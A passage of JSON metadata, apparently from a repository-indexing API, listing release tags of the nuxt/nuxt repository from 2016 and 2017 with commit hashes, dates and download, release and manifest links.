ag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sh